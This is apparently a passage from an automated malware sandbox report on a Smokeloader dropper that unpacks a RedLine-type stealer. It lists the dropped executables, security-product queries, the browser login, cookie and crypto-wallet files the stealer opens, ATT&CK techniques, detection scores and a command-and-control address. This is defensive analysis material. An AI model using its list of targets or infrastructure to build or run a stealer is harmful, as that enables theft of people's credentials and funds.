                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF58E0 cpuid 0_2_00007FF7E1DF58E0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7E1DDA2CC
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00B7C093
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: GetLocaleInfoW,GetNumberFormatW,6_2_00EEC093
                  Source: C:\Users\user\AppData\Local\Temp\3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DE0754
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC51A4 GetVersionExW,0_2_00007FF7E1DC51A4
                  Source: C:\Users\user\AppData\Local\Temp\3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: r.exe, 00000007.00000002.2183831567.0000000006EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 3.exe PID: 7308, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: Yara matchFile source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 3.exe PID: 7308, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                  Process Injection
                  3
                  Obfuscated Files or Information
                  Security Account Manager138
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                  Software Packing
                  NTDS871
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture12
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials561
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job561
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447590 Sample: KR6CT3hIxT.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 100 42 api.ip.sb 2->42 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 8 other signatures 2->52 11 KR6CT3hIxT.exe 1 9 2->11         started        signatures3 process4 file5 36 C:\Users\user\AppData\...\winrar-x64-701.exe, PE32+ 11->36 dropped 38 C:\Users\user\AppData\Local\Temp\4.exe, PE32 11->38 dropped 14 4.exe 8 11->14         started        process6 file7 40 C:\Users\user\AppData\Local\Temp\3.exe, PE32 14->40 dropped 74 Multi AV Scanner detection for dropped file 14->74 76 Machine Learning detection for dropped file 14->76 18 3.exe 4 14->18         started        signatures8 process9 dnsIp10 44 195.2.75.12, 49730, 7000 VDSINA-ASRU Russian Federation 18->44 32 C:\Users\user\AppData\Local\Temp\rdegje.exe, PE32 18->32 dropped 54 Antivirus detection for dropped file 18->54 56 Multi AV Scanner detection for dropped file 18->56 58 Detected unpacking (changes PE section rights) 18->58 60 6 other signatures 18->60 23 rdegje.exe 8 18->23         started        file11 signatures12 process13 file14 34 C:\Users\user\AppData\Local\Temp\r.exe, PE32 23->34 dropped 62 Multi AV Scanner detection for dropped file 23->62 64 Machine Learning detection for dropped file 23->64 27 r.exe 15 48 23->27         started        signatures15 process16 signatures17 66 Antivirus detection for dropped file 27->66 68 Multi AV Scanner detection for dropped file 27->68 70 Detected unpacking (changes PE section rights) 27->70 72 10 other signatures 27->72 30 conhost.exe 27->30         started        process18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  KR6CT3hIxT.exe37%ReversingLabsWin64.Trojan.Smokeloader
                  KR6CT3hIxT.exe55%VirustotalBrowse
                  KR6CT3hIxT.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\3.exe100%AviraTR/Crypt.XPACK.Gen
                  C:\Users\user\AppData\Local\Temp\r.exe100%AviraTR/Crypt.XPACK.Gen
                  C:\Users\user\AppData\Local\Temp\rdegje.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\3.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\4.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\r.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\3.exe49%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\3.exe55%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\4.exe41%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\4.exe44%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\r.exe53%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\r.exe53%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\rdegje.exe34%ReversingLabsByteCode-MSIL.Trojan.RedLine
                  C:\Users\user\AppData\Local\Temp\rdegje.exe35%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe0%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  api.ip.sb0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://ipinfo.io/ip%appdata%0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                  https://api.ip.sb0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://tempuri.org/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                  195.2.75.120%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                  https://api.ipify.orgcookies//setti0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                  http://195.2.75.12:547620%Avira URL Cloudsafe
                  http://ns.adp/1.0/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                  http://tempuri.org/00%Avira URL Cloudsafe
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE0%VirustotalBrowse
                  195.2.75.12:547620%Avira URL Cloudsafe
                  http://195.2.75.12:54762/0%Avira URL Cloudsafe
                  http://ns.microsofo/1.2/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                  195.2.75.12:547620%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                  http://195.2.75.12:547620%VirustotalBrowse
                  http://tempuri.org/00%VirustotalBrowse
                  http://195.2.75.12:54762/0%VirustotalBrowse
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ip.sb
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  195.2.75.12true
                  • Avira URL Cloud: safe
                  unknown
                  195.2.75.12:54762true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://195.2.75.12:54762/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ipinfo.io/ip%appdata%r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabr.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icor.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/CheckConnectResponser.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.datacontract.org/2004/07/r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/EnvironmentSettingsr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://api.ip.sbr.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/CheckConnectr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/VerifyUpdateResponser.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/SetEnvironmentr.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/SetEnvironmentResponser.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/GetUpdatesr.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.ip.sb/geoip%USERPEnvironmentROFILEr.exefalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
